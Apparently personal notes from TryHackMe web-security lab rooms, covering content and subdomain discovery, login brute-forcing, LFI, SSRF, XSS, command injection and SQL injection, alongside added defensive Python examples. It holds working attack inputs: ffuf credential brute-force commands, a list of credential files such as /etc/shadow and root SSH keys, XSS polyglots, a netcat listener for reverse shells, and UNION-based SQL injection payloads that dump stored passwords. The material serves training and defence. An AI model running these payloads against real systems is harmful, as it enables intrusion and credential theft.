Notes) Web Fundamentals
Content Discovery
1) robots.txt
2) favicon
This can give us a clue about which framework is in use.
curl https://static-labs.tryhackme.cloud/sites/favicon/images/favicon.ico | md5sum
https://wiki.owasp.org/index.php/OWASP_favicon_database
3) Sitemap.xml
4) HTTP Headers
curl http://10.10.49.162 -v
5) Manual Discovery
6) OSINT - Google Hacking/Dorking
| Filter | Example | Description |
| --- | --- | --- |
| site | site:tryhackme.com | returns results only from the specified website address |
| inurl | inurl:admin | returns results that have the specified word in the URL |
| filetype | filetype:pdf | returns results which are a particular file extension |
| intitle | intitle:admin | returns results that contain the specified word in the title |
https://en.wikipedia.org/wiki/Google_hacking
7) OSINT - Wappalyzer
Wappalyzer (https://www.wappalyzer.com/) is an online tool and browser extension that helps identify what technologies a website uses, such as frameworks, Content Management Systems (CMS), payment processors and much more, and it can even find version numbers as well.
8) OSINT - Wayback Machine
The Wayback Machine (https://archive.org/web/) is a historical archive of websites that dates back to the late 90s. You can search a domain name, and it will show you all the times the service scraped the web page and saved the contents. This service can help uncover old pages that may still be active on the current website.
9) OSINT - Github
10) S3 Buckets
S3 Buckets are a storage service provided by Amazon AWS, allowing people to save files and even static website content in the cloud, accessible over HTTP and HTTPS.
The format of the S3 buckets is http(s)://{name}.s3.amazonaws.com where {name} is decided by the owner, such as tryhackme-assets.s3.amazonaws.com.
11) Automated Discovery
https://github.com/danielmiessler/SecLists
- Using ffuf
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.49.162/FUZZ
- Using dirb
dirb http://10.10.49.162/ /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
- Using gobuster
gobuster dir --url http://10.10.49.162/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
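Wordlist scanners like the three above leave a distinctive trace on the server side: one client, many 404s in a few seconds. The following is an added detection example (not part of these notes or the tools themselves) that parses combined-format access logs and flags that pattern; the log lines and the threshold/window values are constructed for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx "combined" log format; only the fields the check needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample: one browsing client (10.0.0.5) and one wordlist scan (10.0.0.9).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /admin HTTP/1.1" 404 153 "-" "scanner-demo"
10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /backup HTTP/1.1" 404 153 "-" "scanner-demo"
10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "GET /config HTTP/1.1" 404 153 "-" "scanner-demo"
10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "GET /robots.txt HTTP/1.1" 200 45 "-" "scanner-demo"
10.0.0.9 - - [10/Oct/2023:13:55:42 +0000] "GET /uploads HTTP/1.1" 404 153 "-" "scanner-demo"
10.0.0.5 - - [10/Oct/2023:13:56:02 +0000] "GET /contact HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Return ip/ts/path/status for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m.group("ip"), "path": m.group("path"), "status": int(m.group("status")),
            "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")}

def find_bruteforcers(log_text, threshold=4, window=timedelta(seconds=60)):
    """Return {ip: total_404s} for each client with >= threshold 404s inside one window.
    Sliding window over the client's sorted 404 timestamps; tune threshold/window to the site."""
    misses = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["status"] == 404:
            misses[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, stamps in misses.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            while stamps[end] - stamps[start] > window:
                start += 1           # drop timestamps that fell out of the window
            if end - start + 1 >= threshold:
                flagged[ip] = len(stamps)
                break
    return flagged
```

Run it over a real access log with a threshold above the site's normal 404 rate; the response-size column (153 bytes for every miss here) is the same signal the -fs filter below keys on from the attacker's side.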
Subdomain Enumeration
SSL/TLS Certificates
When an SSL/TLS (Secure Sockets Layer/Transport Layer Security) certificate is created for a domain by a CA (Certificate Authority), the CA takes part in what are called "Certificate Transparency (CT) logs". These are publicly accessible logs of every SSL/TLS certificate created for a domain name. The purpose of Certificate Transparency logs is to stop malicious and accidentally made certificates from being used. We can use this service to our advantage to discover subdomains belonging to a domain: sites like https://crt.sh and https://ui.ctsearch.entrust.com/ui/ctsearchui offer a searchable database of certificates that shows current and historical results.
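crt.sh can return its results as JSON, one record per certificate with a newline-separated name_value field. The following is an added example (not from these notes or from crt.sh) that turns such output into a deduplicated subdomain list; the records are constructed to look like that format so it runs offline, and the wildcard, mixed-case and look-alike-domain cases are included deliberately.

```python
import json

# Constructed records in the shape of crt.sh's JSON output (common_name, name_value).
SAMPLE_CRTSH = json.dumps([
    {"common_name": "www.example.com", "name_value": "www.example.com\nexample.com"},
    {"common_name": "*.example.com", "name_value": "*.example.com\nmail.example.com"},
    {"common_name": "dev.example.com", "name_value": "DEV.example.com"},
    {"common_name": "example.com.evil.test", "name_value": "example.com.evil.test"},
])

def subdomains_from_ct(json_text, domain):
    """Return the sorted, unique hostnames under `domain` found in CT records.

    Wildcards (*.example.com) are reduced to the name they cover, everything is
    lower-cased, and a host that only contains the domain as a substring (the
    last constructed record) fails the suffix check and is dropped.
    """
    domain = domain.lower().rstrip(".")
    found = set()
    for rec in json.loads(json_text):
        names = rec.get("name_value", "").split("\n") + [rec.get("common_name", "")]
        for name in names:
            name = name.strip().lower().rstrip(".")
            if name.startswith("*."):
                name = name[2:]
            if name == domain or name.endswith("." + domain):
                found.add(name)
    return sorted(found)

if __name__ == "__main__":
    print(subdomains_from_ct(SAMPLE_CRTSH, "example.com"))
```

The resulting list is a defender's inventory as much as an attacker's: every name a CA was willing to certify should match something the organisation knows about.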
OSINT - Search Engine
Go to Google and use the search term -site:www.tryhackme.com site:*.tryhackme.com, which should reveal a subdomain for tryhackme.com; use that subdomain to answer the question below.
DNS Bruteforce
dnsrecon -t brt -d acmeitsupport.thm
OSINT - Sublist3r
Automation Using Sublist3r
To speed up the process of OSINT subdomain discovery, we can automate the above methods with the help of tools like Sublist3r.
./sublist3r.py -d acmeitsupport.thm
Virtual host
user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.239.36
The above command uses the -w switch to specify the wordlist we are going to use. The -H switch adds/edits a header (in this instance, the Host header), we have the FUZZ keyword in the space where a subdomain would normally go, and this is where we will try all the options from the wordlist.
Look at the results, then add the -fs option to filter out responses of the size that every nonexistent host returns.
user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.239.36 -fs 2395
Authentication Bypass
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.184.90/customers/signup -mr "username already exists"
Create valid_usernames.txt from the usernames found above.
password bruteforce
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.184.90/customers/login -fc 200
Logical Flaw
curl 'http://10.10.184.90/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert'
Cookie Tampering
Search for the hash value online.
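A cookie that only encodes or hashes its data can be decoded, edited or looked up; a cookie signed with a server-side key cannot be altered without the key. The following is an added example (not from these notes) showing both; the key and the session data are constructed for the demo.

```python
import base64, hashlib, hmac, json

SECRET_KEY = b"constructed-demo-key-replace-in-production"  # assumption: never leaves the server

def make_cookie_unsigned(data):
    """Base64 of JSON: anyone can decode, edit and re-encode it."""
    return base64.urlsafe_b64encode(json.dumps(data).encode()).decode()

def read_cookie_unsigned(cookie):
    """Trusts whatever the client sent back."""
    return json.loads(base64.urlsafe_b64decode(cookie))

def make_cookie_signed(data, key=SECRET_KEY):
    """payload.signature, where signature = HMAC-SHA256(key, payload)."""
    payload = base64.urlsafe_b64encode(json.dumps(data).encode())
    sig = hmac.new(key, payload, hashlib.sha256).hexdigest()
    return payload.decode() + "." + sig

def read_cookie_signed(cookie, key=SECRET_KEY):
    """Return the data only if the signature verifies; None if it was tampered with."""
    try:
        payload, sig = cookie.rsplit(".", 1)
    except ValueError:
        return None
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, sig):  # constant-time comparison
        return None
    return json.loads(base64.urlsafe_b64decode(payload))

def demo():
    """Return (unsigned_accepted, signed_accepted) after flipping the admin flag."""
    user = {"user": "jon", "admin": False}
    # Unsigned: decode, edit, re-encode; the server believes it.
    forged = make_cookie_unsigned({**read_cookie_unsigned(make_cookie_unsigned(user)), "admin": True})
    unsigned_accepted = read_cookie_unsigned(forged)["admin"]
    # Signed: same edit with the old signature re-attached; verification fails.
    _, sig = make_cookie_signed(user).rsplit(".", 1)
    forged_signed = make_cookie_unsigned({**user, "admin": True}) + "." + sig
    signed_accepted = read_cookie_signed(forged_signed) is not None
    return unsigned_accepted, signed_accepted
```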
IDOR
Insecure Direct Object Reference
Encoded IDs
| Location | Description |
| --- | --- |
| /etc/issue | contains a message or system identification to be printed before the login prompt. |
| /etc/profile | controls system-wide default variables, such as Export variables, File creation mask (umask), Terminal types, Mail messages to indicate when new mail has arrived |
| /proc/version | specifies the version of the Linux kernel |
| /etc/passwd | has all registered users that have access to a system |
| /etc/shadow | contains information about the system's users' passwords |
| /root/.bash_history | contains the history commands for the root user |
| /var/log/dmessage | contains global system messages, including the messages that are logged during system startup |
| /var/mail/root | all emails for the root user |
| /root/.ssh/id_rsa | Private SSH keys for root or any known valid user on the server |
| /var/log/apache2/access.log | the accessed requests for the Apache webserver |
| C:\boot.ini | contains the boot options for computers with BIOS firmware |
Local File Inclusion (LFI)
Using a null byte
%00
If it doesn't work from the input field, also try it from the address bar.
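The following is an added example (not from these notes) of a hypothetical include routine written the vulnerable way, with the traversal-plus-null-byte trick above applied to it, beside a hardened version that rejects null bytes and confines the resolved path. The web root is constructed in a temporary directory so it runs offline.

```python
import os, tempfile

# Constructed web root: one legitimate include plus a file that must never be served.
BASE = tempfile.mkdtemp()
os.makedirs(os.path.join(BASE, "includes"))
with open(os.path.join(BASE, "includes", "menu.html"), "w") as f:
    f.write("<nav>menu</nav>")
with open(os.path.join(BASE, "secret.txt"), "w") as f:
    f.write("should never be served")

def include_vulnerable(name):
    """Classic LFI: the user value is joined straight onto the include directory.
    The split emulates the C-string truncation at %00 that old PHP versions had."""
    path = os.path.join(BASE, "includes", name.split("\x00")[0])
    with open(path) as f:
        return f.read()

def include_hardened(name):
    """Reject null bytes outright, then require the resolved path to stay under includes/."""
    if "\x00" in name:
        raise ValueError("null byte in path")
    root = os.path.realpath(os.path.join(BASE, "includes"))
    path = os.path.realpath(os.path.join(root, name))   # collapses ../ and symlinks
    if os.path.commonpath([root, path]) != root:
        raise ValueError("path escapes include directory")
    with open(path) as f:
        return f.read()

def demo():
    """Traversal plus null byte reads secret.txt through the vulnerable version only."""
    leaked = include_vulnerable("../secret.txt\x00.html")
    try:
        include_hardened("../secret.txt\x00.html")
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked, include_hardened("menu.html")
```

An allowlist of include names is stronger still; the realpath check is the minimum when the name must stay user-controlled.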
Remote File Inclusion - RFI
document.cookie = "user=John"; // only updates the value of the cookie named 'user'
alert(document.cookie); // show all cookies
SSRF stands for Server-Side Request Forgery
Append &x= at the end to ignore the rest of the URL.
requestbin.com can be used to catch HTTP requests from a server.
Defeating Common SSRF Defenses
In a cloud environment, it would be beneficial to block access to the IP address 169.254.169.254, which serves metadata for the deployed cloud server, including possibly sensitive information.
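Blocking the metadata address is only effective when the check looks at the host the request will really go to, not at the raw string. The following is an added example (not from these notes) of a hypothetical outbound-URL check for a server that fetches user-supplied URLs: it parses the URL, rejects non-HTTP schemes, and refuses any host that is, or resolves to, a link-local or private address. DNS resolution goes through a hook so the demo can use a constructed lookup table.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "169.254.0.0/16",  # link-local; 169.254.169.254 (cloud metadata) lives here
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "0.0.0.0/8",
    "::1/128", "fc00::/7", "fe80::/10",
)]

def system_resolve(host):
    """Real DNS lookup; swapped out for a constructed table in the demo."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def is_safe_url(url, resolve=system_resolve):
    """Return (ok, reason). The URL is parsed, not string-matched, so the real host
    is judged; every address the host resolves to must lie outside BLOCKED_NETS."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    host = parts.hostname
    if not host:
        return False, "no host"
    try:
        addrs = {ipaddress.ip_address(host)}          # raw IP literal, no lookup needed
    except ValueError:
        try:
            addrs = {ipaddress.ip_address(a) for a in resolve(host)}
        except (socket.gaierror, ValueError):
            return False, "unresolvable host"
    for addr in addrs:
        if any(addr in net for net in BLOCKED_NETS):
            return False, f"{addr} is in a blocked range"
    return True, "ok"

# Constructed resolver so the example needs no network. 203.0.113.0/24 is a
# documentation range; the second name points back at the metadata address.
FAKE_DNS = {"api.example.test": {"203.0.113.10"}, "meta.example.test": {"169.254.169.254"}}

def fake_resolve(host):
    if host not in FAKE_DNS:
        raise socket.gaierror(f"constructed resolver has no entry for {host}")
    return FAKE_DNS[host]
```

The check runs before the fetch, so a real deployment must also connect to the address it validated (otherwise a second DNS answer can differ) and re-run the check on every redirect.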
Intro to Cross-site Scripting
Examples:
- XSS found in Shopify
- $7,500 for XSS found in Steam chat
- $2,500 for XSS in HackerOne
- XSS found in Infogram
How to test for Reflected XSS:
You'll need to test every possible point of entry; these include:
- Parameters in the URL Query String
- URL File Path
- Sometimes HTTP Headers (although unlikely exploitable in practice)
A popular tool for Blind XSS attacks is XSS Hunter Express. Although it's possible to make your own tool in JavaScript, this tool will automatically capture cookies, URLs, page contents and more.
When < and > are filtered:
/images/cat.jpg" onload="alert('THM');
polyglots
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e
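The attribute breakout above works because removing angle brackets does nothing about a double quote inside an attribute value. The following is an added example (not from these notes) of a hypothetical template rendered three ways, with Python's HTML parser used to show which attributes a browser-like parser ends up assigning; the payloads are constructed and the first is the one quoted above.

```python
import html
from html.parser import HTMLParser

# Constructed payloads: the first is the attribute breakout quoted above.
ATTR_PAYLOAD = "/images/cat.jpg\" onload=\"alert('THM');"
UNQUOTED_PAYLOAD = "x onload=alert('THM')"

def render_naive(src):
    """Only strips angle brackets, then drops the value into a quoted attribute."""
    cleaned = src.replace("<", "").replace(">", "")
    return f'<img src="{cleaned}">'

def render_escaped(src):
    """Attribute context: encode every character that can close the quotes or open a tag."""
    return f'<img src="{html.escape(src, quote=True)}">'

def render_unquoted(src):
    """Escaping alone is not enough when the template forgot the quotes."""
    return f'<img src={html.escape(src, quote=True)}>'

class _ImgAttrs(HTMLParser):
    """Collect the attributes a browser-like parser would assign to the <img> tag."""
    def __init__(self):
        super().__init__()
        self.attrs = {}
    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.attrs = dict(attrs)

def img_attributes(markup):
    p = _ImgAttrs()
    p.feed(markup)
    return p.attrs

def demo():
    """True means an event-handler attribute survived into the parsed tag."""
    return {
        "naive": "onload" in img_attributes(render_naive(ATTR_PAYLOAD)),
        "escaped": "onload" in img_attributes(render_escaped(ATTR_PAYLOAD)),
        "unquoted": "onload" in img_attributes(render_unquoted(UNQUOTED_PAYLOAD)),
    }
```

The third case is the caveat: output encoding must match the context, and in attribute context that means quoting the attribute as well as escaping the value.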
Netcat listener
nc -l -p 9001
The same listener with -n (no DNS lookups) and -v (verbose output):
nc -n -l -v -p 9001
Remediation
| Method | Description |
| --- | --- |
| Blind | This type of injection is where there is no direct output from the application when testing payloads. You will have to investigate the behaviours of the application to determine whether or not your payload was successful. |
| Verbose | This type of injection is where there is direct feedback from the application once you have tested a payload. For example, running the whoami command to see what user the application is running under. The web application will output the username on the page directly. |
Useful payloads
I have compiled some valuable payloads for both Linux & Windows into the tables below.
Linux
| Payload | Description |
| --- | --- |
| whoami | See what user the application is running under. |
| ls | List the contents of the current directory. You may be able to find files such as configuration files, environment files (tokens and application keys), and many more valuable things. |
| ping | This command will invoke the application to hang. This will be useful in testing an application for blind command injection. |
| sleep | This is another useful payload in testing an application for blind command injection, where the machine does not have ping installed. |
| nc | Netcat can be used to spawn a reverse shell onto the vulnerable application. You can use this foothold to navigate around the target machine for other services, files, or potential means of escalating privileges. |
Windows
| Payload | Description |
| --- | --- |
| whoami | See what user the application is running under. |
| dir | List the contents of the current directory. You may be able to find files such as configuration files, environment files (tokens and application keys), and many more valuable things. |
| ping | This command will invoke the application to hang. This will be useful in testing an application for blind command injection. |
| timeout | This command will also invoke the application to hang. It is also useful for testing an application for blind command injection if the ping command is not installed. |
Payload cheat sheet
https://github.com/payloadbox/command-injection-payload-list
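The payloads above only work when user input is pasted into a shell command line. The following is an added example (not from these notes) of a hypothetical "ping a host" feature written that way next to a hardened version that validates the host and passes an argv list with no shell; it returns the command that would run rather than executing it, so the injection is visible without touching the system.

```python
import ipaddress, re, subprocess

# RFC 1123 hostname: labels of letters, digits and hyphens, no metacharacters.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$",
    re.IGNORECASE)

def build_ping_vulnerable(host):
    """The string a shell=True call would hand to /bin/sh; `;`, `&&`, `|` all work here."""
    return f"ping -c 1 {host}"

def validate_host(host):
    """Accept an IP literal or a hostname matching HOSTNAME_RE; reject everything else."""
    try:
        ipaddress.ip_address(host)
        return host
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise ValueError("invalid host")

def build_ping_hardened(host):
    """argv list: no shell is involved, so metacharacters are never interpreted."""
    return ["ping", "-c", "1", validate_host(host)]

def run_ping(argv, timeout=5):
    """Run the hardened argv; the timeout stops sleep/ping-style blind probes from hanging a worker."""
    return subprocess.run(argv, capture_output=True, timeout=timeout)

def demo():
    """Return (vulnerable command string, hardened version rejected?, hardened argv)."""
    injected = "127.0.0.1; whoami"
    vuln_cmd = build_ping_vulnerable(injected)
    try:
        build_ping_hardened(injected)
        blocked = False
    except ValueError:
        blocked = True
    return vuln_cmd, blocked, build_ping_hardened("10.10.49.162")
```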
SQL
select * from users;
select username,password from users;
select * from users LIMIT 1;
select * from users where username='admin';
select * from users where username != 'admin';
select * from users where username='admin' or username='jon';
select * from users where username='admin' and password='p4ssword';
-- wildcard: %
select * from users where username like 'a%';
select * from users where username like '%n';
select * from users where username like '%mi%';
SELECT name,address,city,postcode from customers UNION SELECT company,address,city,postcode from suppliers;
insert into users (username,password) values ('bob','password123');
update users SET username='root',password='pass123' where username='admin';
delete from users where username='martin';
delete from users;
SQL Injection
In-Band SQLi
Try typing an apostrophe ( ' ) after id=1 and press enter. This returns an SQL error informing you of an error in your syntax.
1 UNION SELECT 1
1 UNION SELECT 1,2
1 UNION SELECT 1,2,3
0 UNION SELECT 1,2,3
0 UNION SELECT 1,2,database()
0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'
0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'
0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users
Blind
Blind SQLi - Authentication Bypass
select * from users where username='%username%' and password='%password%' LIMIT 1;
select * from users where username='' and password='' OR 1=1;
Boolean Based
select * from users where username = '%username%' LIMIT 1;
admin123' UNION SELECT 1;--
admin123' UNION SELECT 1,2,3;--
admin123' UNION SELECT 1,2,3 where database() like '%';--
admin123' UNION SELECT 1,2,3 where database() like 's%';--
admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'a%';--
admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name='users';--
admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'a%';
admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'a%' and COLUMN_NAME !='id';
admin123' UNION SELECT 1,2,3 from users where username like 'a%
admin123' UNION SELECT 1,2,3 from users where username='admin' and password like 'a%
Time based
referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'u%';--
Out-of-Band SQLi